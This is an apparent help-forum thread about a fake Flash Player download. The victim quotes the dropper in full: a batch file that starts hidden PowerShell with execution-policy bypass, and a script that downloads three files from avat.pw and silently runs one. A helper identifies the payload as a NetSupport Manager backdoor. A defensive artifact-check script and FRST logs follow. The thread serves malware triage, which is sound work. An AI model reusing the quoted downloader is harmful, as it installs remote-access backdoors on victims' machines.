
Was Fooled Into Downloading Fake Flash Player File


7 replies to this topic

#1 zengotten

Posted 19 October 2016 - 06:44 PM

A Steam user sent me a message with a link to a fake video sharing site, it's made to fool you into downloading a fake flash player install file.

 

I downloaded the file and ran it thinking that maybe my flash player was out of date, I wasn't thinking.

 

I reached behind my computer and unplugged the power when I saw that it opened up a command prompt window. I know this is bad for my computer but it was the fastest way to stop the malicious file from doing whatever it was doing. I don't know if I stopped it in time.

 

I looked at the site later and found out that all of the links on the page just loop back to the same address every time and the flash player file was being downloaded from someone's dropbox account.

 

I looked at the file more closely and found it is a hidden .zip file that contains two files:

devmdn.ps1
dvstrb.bat

The contents of the two files when viewed through notepad++ are as follows:

dvstrb.bat

@echo off
start powershell.exe -windowstyle hidden -executionpolicy bypass -file devmdn.ps1
ping 127.0.0.1 -n 3

devmdn.ps1

$CheckFile = Test-Path "$env:APPDATA/pqs.bin"
if ($CheckFile) {exit}
1 > "$env:APPDATA/pqs.bin"
$down = New-Object System.Net.WebClient
$url48  = "http://avat.pw/me/zsc";
$url58  = "http://avat.pw/me/apparchdv";
$url68  = "http://avat.pw/me/netvcst";
$file48 = "$env:APPDATA/zsc.exe";
$file58 = "$env:APPDATA/apparchdv";
$file68 = "$env:APPDATA/netvcst.cmd";
$down.DownloadFile($url48,$file48);
$down.DownloadFile($url58,$file58);
$down.DownloadFile($url68,$file68);
$exec = New-Object -com shell.application
$exec.shellexecute($file68, "", "", "open", 0);

I do not know if these files had enough time to fully execute, would someone here be kind enough to look into this and help me ensure that I have not been infected and no damage has been done?





#2 Aura


Posted 19 October 2016 - 08:41 PM

Hi zengotten :)

My name is Aura and I'll be assisting you with your malware issue. Since we'll be working together, you can call me Aura or Yoan, which is my real name, it's up to you! Now that we've broken the ice, I'll just ask you a few things during the time we'll be working together to clean your system and get it back to an operational state.
  • As you'll notice, the logs we are asking for here are quite lengthy, so it's normal for me to not reply exactly after you post them. This is because I need some time to analyse them and then act accordingly. However, I'll always reply within 24 hours, 48 hours at most if something unexpected happens;
  • As long as I'm assisting you on BleepingComputer, in this thread, I'll ask you to not seek assistance anywhere else for any issue related to the system we are working on. If you have an issue, question, etc. about your computer, please ask it in this thread and I'll assist you;
  • The same principle applies to any modifications you make to your system, I would like you to ask me before you do any manipulations that aren't in the instructions I posted. This is to ensure that we are operating in sync and I know exactly what's happening on your system;
  • If you aren't sure about an instruction I'm giving you, ask me about it. This is to ensure that the clean-up process goes without any issue. I'll answer you and even give you more precise instructions/explanations if you need. There's no shame in asking questions here, better be safe than sorry!;
  • If you don't reply to your thread within 3 days, I'll bump this thread to let you know that I'm waiting for you. If you don't reply after 5 days, it'll be closed. If you return after that period, you can send me a PM to get it unlocked and we'll continue where we left off;
  • Since malware can work quickly, we want to get rid of them as fast as we can, before they make unknown changes to the system. This being said, I would appreciate if you could reply to this thread within 24 hours of me posting. This way, we'll have a good clean-up rhythm and the chances of complications will be reduced;
  • I'm against any form of pirated, illegal and counterfeit software and material. So if you have any installed on your system, I'll ask you to uninstall them right now. You don't have to tell me if you indeed had some or not, I'll give you the benefit of the doubt. Plus, this would be against BleepingComputer's rules;
  • In the end, you are the one asking for assistance here. So if you wish to go a different way during the clean-up, like format and reinstall Windows, you are free to do so. I would appreciate you to let me know about it first, and if you need, I can also assist you in the process;
  • I would appreciate if you were to stay with me until the end, which means, until I declare your system clean. Just because your system isn't behaving weirdly anymore, or is running better than before, it doesn't mean that the infection is completely gone;
    This being said, I have a full time job so sometimes it'll take longer for me to reply to you. Don't worry, you'll be my first priority as soon as I get home and have time to look at your thread;
This being said, it's time to clean-up some malware, so let's get started, shall we? :)

I analysed the payload hosted on avat.pw, and it turns out to be a NetSupport Manager client. apparchdv is a password-protected 7-Zip archive containing all the files, zsc is a renamed 7za.exe (7-Zip command line executable) used to decompress apparchdv and netvcst is a batch script used for the deployment of the client on the system. In other words, this is a backdoor trojan infection, so your system has most likely been compromised.

Since I have the full installation script, I can see whether or not the install succeeded. Follow the instructions in the thread below to run FRST and provide me the content of both logs (FRST.txt and Addition.txt).

http://www.bleepingcomputer.com/forums/topic34773.html

Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.
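
A host-side check for the files named in devmdn.ps1, as an added example that is not part of the original thread: because the script writes its marker and then its three downloads in a fixed order, the last file present in %APPDATA% shows how far it got before the power was cut. The file names come from the posted script and the roles from the analysis above; the `$AppData` parameter and the stage wording are assumptions of this example, which uses only cmdlets available in PowerShell 2.0 (the version shipped with Windows 7).

```powershell
# Added example: report which files created by devmdn.ps1 exist in %APPDATA%.
param(
    # Assumption: run as the affected user, so this is the profile the dropper wrote to.
    [string]$AppData = $env:APPDATA
)

# File names come from devmdn.ps1, listed in the order the script creates them.
$artifacts = @(
    @{ Name = 'pqs.bin';     Role = 'run-once marker, written before any download' },
    @{ Name = 'zsc.exe';     Role = 'download 1: renamed 7za.exe' },
    @{ Name = 'apparchdv';   Role = 'download 2: password-protected 7-Zip archive' },
    @{ Name = 'netvcst.cmd'; Role = 'download 3: deployment batch script' }
)

$stage = 0   # position of the last artifact found (0 = none)
$index = 0
$report = foreach ($a in $artifacts) {
    $index++
    $path    = Join-Path $AppData $a.Name
    $present = Test-Path -LiteralPath $path
    $size    = $null
    $created = $null
    $note    = ''
    if ($present) {
        # -Force so that hidden or system files are still returned.
        $item    = Get-Item -LiteralPath $path -Force
        $size    = $item.Length
        $created = $item.CreationTime
        $stage   = $index
        # WebClient.DownloadFile creates its target before the transfer completes,
        # so an empty download target means the transfer was cut off.
        if ($index -gt 1 -and $size -eq 0) {
            $note = 'empty file: transfer was interrupted'
        }
    }
    New-Object PSObject -Property @{
        Artifact = $a.Name; Present = $present; Size = $size
        Created  = $created; Role = $a.Role; Note = $note
    }
}

# Map the last artifact found to the point the script had reached.
$summary = switch ($stage) {
    0 { 'No artifacts in this profile: the script did not reach its marker write here.' }
    1 { 'Marker only: the script started, but no download target was created.' }
    2 { 'Stopped during or after download 1; the archive and batch script are absent.' }
    3 { 'Stopped during or after download 2; the batch script is absent.' }
    4 { 'All three downloads were started; these files alone do not show whether netvcst.cmd ran.' }
}

# Select-Object fixes the column order, which New-Object -Property does not preserve.
$report | Select-Object Artifact, Present, Size, Created, Role, Note |
    Format-Table -AutoSize -Wrap
Write-Output $summary
```

A non-zero size does not prove a download completed, and the file list cannot show whether the NetSupport Manager client was deployed; the FRST logs requested above answer that.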


#3 zengotten


Posted 19 October 2016 - 09:23 PM

Thank you very much! Here are the logs:

 

FRST.txt

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 17-10-2016
Ran by King (administrator) on KING-PC (19-10-2016 19:20:02)
Running from C:\Users\King\Desktop
Loaded Profiles: King (Available Profiles: King)
Platform: Windows 7 Ultimate Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 8 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(Creative Technology Ltd) C:\Program Files (x86)\Creative\Shared Files\CTAudSvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Dropbox, Inc.) C:\Windows\System32\DbxSvc.exe
(DTS) C:\Program Files\Realtek\Audio\HDA\DTSAudioService64.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe
() C:\Program Files (x86)\Oculus\Service\OVRServiceLauncher.exe
() C:\Windows\System32\PnkBstrA.exe
(iZ3D Inc.) C:\Program Files (x86)\iZ3D Driver\Win64\S3DCService.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(iZ3D Inc.) C:\Program Files (x86)\iZ3D Driver\Win32\S3DCService.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
() C:\Program Files (x86)\Oculus\Service\OVRServer_x64.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\LCore.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
() C:\Users\King\Downloads\cpk_05\CPKeeper.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.31.5\GoogleCrashHandler.exe
(Creative Technology Ltd) C:\Windows\SysWOW64\CTHELPER.EXE
(Dropbox, Inc.) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
(Creative Technology Ltd) C:\Windows\SysWOW64\Ctxfihlp.exe
(Oculus VR, LLC) C:\Program Files (x86)\Oculus\Tools\OculusConfigUtil.exe
(Creative Technology Ltd) C:\Windows\SysWOW64\CTxfispi.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.31.5\GoogleCrashHandler64.exe
(JimsApps) D:\Program Files (x86)\Snaz\Snaz.exe
(Cerulean Studios) D:\Program Files (x86)\Trillian\trillian.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Valve Corporation) D:\Program Files (x86)\steam\Steam.exe
(Valve Corporation) D:\Program Files (x86)\steam\bin\cef\cef.winxp\steamwebhelper.exe
(Valve Corporation) C:\Program Files (x86)\Common Files\Steam\SteamService.exe
(Valve Corporation) D:\Program Files (x86)\steam\bin\cef\cef.winxp\steamwebhelper.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe


==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [MSC] => C:\Program Files\Microsoft Security Client\msseces.exe [1354712 2016-08-30] (Microsoft Corporation)
HKLM\...\Run: [Launch LCore] => C:\Program Files\Logitech Gaming Software\LCore.exe [15003256 2015-09-19] (Logitech Inc.)
HKLM\...\Run: [NvBackend] => "C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe"
HKLM\...\Run: [RtHDVBg_DTS] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1361112 2013-11-05] (Realtek Semiconductor)
HKLM-x32\...\Run: [AsioThk32Reg] => REGSVR32.EXE /S CTASIO.DLL
HKLM-x32\...\Run: [CTHelper] => c:\windows\system32\CTHELPER.EXE [28672 2007-03-05] (Creative Technology Ltd)
HKLM-x32\...\Run: [Dropbox] => C:\Program Files (x86)\Dropbox\Client\Dropbox.exe [25366584 2016-10-10] (Dropbox, Inc.)
HKLM-x32\...\Run: [CTxfiHlp] => c:\windows\system32\CTXFIHLP.EXE [26624 2007-03-05] (Creative Technology Ltd)
HKU\S-1-5-21-1771700083-1338792134-2885675772-1001\...\Run: [Color Profile Keeper] => C:\Users\King\Downloads\cpk_05\CPKeeper.exe [7922176 2013-07-13] ()
ShellIconOverlayIdentifiers: [ DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.65536.dll [2016-10-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt10] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.65536.dll [2016-10-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.65536.dll [2016-10-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt3] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.65536.dll [2016-10-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt4] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.65536.dll [2016-10-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt5] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.65536.dll [2016-10-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt6] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.65536.dll [2016-10-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt7] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.65536.dll [2016-10-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt8] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.65536.dll [2016-10-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt9] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.65536.dll [2016-10-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.65536.dll [2016-10-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt10] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.65536.dll [2016-10-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.65536.dll [2016-10-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt3] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.65536.dll [2016-10-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt4] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.65536.dll [2016-10-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt5] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.65536.dll [2016-10-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt6] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.65536.dll [2016-10-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt7] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.65536.dll [2016-10-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt8] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.65536.dll [2016-10-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt9] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.65536.dll [2016-10-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.65536.dll [2016-10-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.65536.dll [2016-10-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.65536.dll [2016-10-10] (Dropbox, Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\OculusConfigUtil.lnk [2015-02-02]
ShortcutTarget: OculusConfigUtil.lnk -> C:\Program Files (x86)\Oculus\Tools\OculusConfigUtil.exe (Oculus VR, LLC)
Startup: C:\Users\King\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OBS Multiplatform.lnk [2015-11-28]
ShortcutTarget: OBS Multiplatform.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Startup: C:\Users\King\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Snaz.exe - Shortcut.lnk [2015-11-08]
ShortcutTarget: Snaz.exe - Shortcut.lnk -> D:\Program Files (x86)\Snaz\Snaz.exe (JimsApps)
Startup: C:\Users\King\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Trillian.lnk [2015-08-01]
ShortcutTarget: Trillian.lnk -> D:\Program Files (x86)\Trillian\trillian.exe (Cerulean Studios)
GroupPolicyScripts: Restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\..\Interfaces\{11636072-0BBA-48C9-AEEE-73D6482B18FF}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{1DFE6D25-1D28-4AAE-992B-B21EF9F2AD28}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{A8228829-EC5F-4643-9EBC-3CC28D588877}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{EF2FD45A-2E40-4754-BBA6-912EAF653182}: [NameServer] 8.8.8.8,8.8.4.4
ManualProxies: 

Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-1771700083-1338792134-2885675772-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\S-1-5-21-1771700083-1338792134-2885675772-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
SearchScopes: HKLM-x32 -> DefaultScope {1032E68A-D948-4F15-89A3-5E2DA7119F3F} URL = 
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll [2015-03-19] (Oracle Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corp.)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll [2015-03-19] (Oracle Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll [2014-07-11] (Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corp.)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll [2014-07-11] (Oracle Corporation)
DPF: HKLM {AA570693-00E2-4907-B6F1-60A1199B030C} hxxps://juniper.net/dana-cached/sc/JuniperSetupClient64.cab
DPF: HKLM-x32 {D4B68B83-8710-488B-A692-D74B50BA558E} hxxp://ccfiles.creative.com/Web/softwareupdate/ocx/15113/CTPIDPDE.cab
DPF: HKLM-x32 {E705A591-DA3C-4228-B0D5-A356DBA42FBF} hxxp://ccfiles.creative.com/Web/softwareupdate/su2/ocx/20015/CTSUEng.cab
DPF: HKLM-x32 {F27237D7-93C8-44C2-AC6E-D6057B9A918F} hxxps://juniper.net/dana-cached/sc/JuniperSetupClient.cab
DPF: HKLM-x32 {F6ACF75C-C32C-447B-9BEF-46B766368D29} hxxp://ccfiles.creative.com/Web/softwareupdate/ocx/130321/CTPID.cab
Filter: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2015-12-10] (Microsoft Corporation)
Filter-x32: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2015-12-10] (Microsoft Corporation)
Filter: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2015-12-10] (Microsoft Corporation)
Filter-x32: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2015-12-10] (Microsoft Corporation)

FireFox:
========
FF ProfilePath: C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default [2016-10-19]
FF DefaultSearchEngine: Mozilla\Firefox\Profiles\t7xymp7a.default -> Google
FF DefaultSearchEngine.US: Mozilla\Firefox\Profiles\t7xymp7a.default -> Google
FF Homepage: Mozilla\Firefox\Profiles\t7xymp7a.default -> www.google.com
FF Extension: (Bookmark Autohider) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\bookmarkhider@exi.name.xpi [2016-05-02]
FF Extension: (United States English Spellchecker) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\en-US@dictionaries.addons.mozilla.org [2016-03-19]
FF Extension: (Facebook Disconnect) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\facebook@disconnect.me.xpi [2016-05-02]
FF Extension: (Firefox Hotfix) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\firefox-hotfix@mozilla.org.xpi [2016-08-31]
FF Extension: (Lazarus: Form Recovery) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\lazarus@interclue.com.xpi [2016-05-02]
FF Extension: (Metal Watcher) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\metalwatcher@kgmoney.net.xpi [2016-05-02]
FF Extension: (Movable Firefox Button) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\movableAppButton@Merci.chao.xpi [2015-05-28]
FF Extension: (Classic Compact Options) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\notreal.ccoptions@environmentalchemistry.com.xpi [2015-05-26]
FF Extension: (Restart Button) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\restartbutton@strk.jp.xpi [2016-05-02]
FF Extension: (Save Session) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\savesession@noasobi.net.xpi [2016-05-02]
FF Extension: (TinEye Reverse Image Search) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\tineye@ideeinc.com.xpi [2016-09-08]
FF Extension: (Yet Another Smooth Scrolling) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\yetanothersmoothscrolling@kataho.xpi [2016-05-02]
FF Extension: (Flagfox) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\{1018e4d6-728f-4b20-ad56-37578a4de76b}.xpi [2016-10-14]
FF Extension: (Image Zoom) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\{1A2D0EC4-75F5-4c91-89C4-3656F6E44B68}.xpi [2016-05-02]
FF Extension: (ScrapBook) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\{53A03D43-5363-4669-8190-99061B2DEBA5}.xpi [2016-09-08]
FF Extension: (Compact Menu 2) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\{57068FBE-1506-42ee-AB02-BD183E7999E4}.xpi [2016-05-02]
FF Extension: (No Name) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\{5d9968c3-101c-4944-ba71-72d77393322d}.oldbackup [2014-05-09] [not signed]
FF Extension: (NoScript) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\{73a6fe31-595d-460b-a920-fcc0f8843232}.xpi [2016-08-19]
FF Extension: (Work Offline) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\{761a54f1-8ccf-4112-9e48-dbf72adf6244}.xpi [2016-05-02]
FF Extension: (IE Tab) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\{77b819fa-95ad-4f2c-ac7c-486b356188a9} [2016-05-02]
FF Extension: (Live IP Address) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\{7C9AE782-DB21-4e40-81FB-AD8A53A6233A} [2015-09-22]
FF Extension: (Mozilla Archive Format) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\{7f57cf46-4467-4c2d-adfa-0cba7c507e54}.xpi [2016-06-13]
FF Extension: (Live HTTP headers) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\{8f8fe09b-0bd3-4470-bc1b-8cad42b8203a} [2016-05-02]
FF Extension: (FireFTP) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\{a7c6cf7f-112c-4500-a7ea-39801a327e5f} [2016-06-22]
FF Extension: (Password Exporter) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\{B17C1C5A-04B1-11DB-9804-B622A1EF5492}.xpi [2016-04-06]
FF Extension: (Smartest Bookmarks Bar) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\{b442f4c0-c292-4998-aabe-48608a73ba75}.xpi [2012-11-17] [not signed]
FF Extension: (Download YouTube Videos as MP4) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\{b9bfaf1c-a63f-47cd-8b9a-29526ced9060}.xpi [2016-09-08]
FF Extension: (Adblock Plus) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2016-05-01]
FF Extension: (BetterPrivacy) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\{d40f5e7b-d2cf-4856-b441-cc613eeffbe3}.xpi [2016-05-28]
FF Extension: (Classic Compact) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\{D46E8522-6E86-44b1-A622-58C0668AD78E}.xpi [2013-12-24] [not signed]
FF Extension: (Tab Mix Plus) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\{dc572301-7619-498c-a57d-39143191b318}.xpi [2016-06-09]
FF HKLM-x32\...\Firefox\Extensions: [{F003DA68-8256-4b37-A6C4-350FA04494DF}] - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt => not found
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_22_0_0_209.dll [2016-08-01] ()
FF Plugin: @esn/npbattlelog,version=2.6.2 -> C:\Program Files (x86)\Battlelog Web Plugins\2.6.2\npbattlelogx64.dll [2014-12-03] (EA Digital Illusions CE AB)
